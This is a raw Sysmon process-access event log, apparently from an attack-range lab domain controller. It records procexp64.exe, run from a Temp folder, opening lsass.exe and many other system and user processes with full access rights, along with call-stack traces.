10341000x8000000000000000784796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:42.065{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program 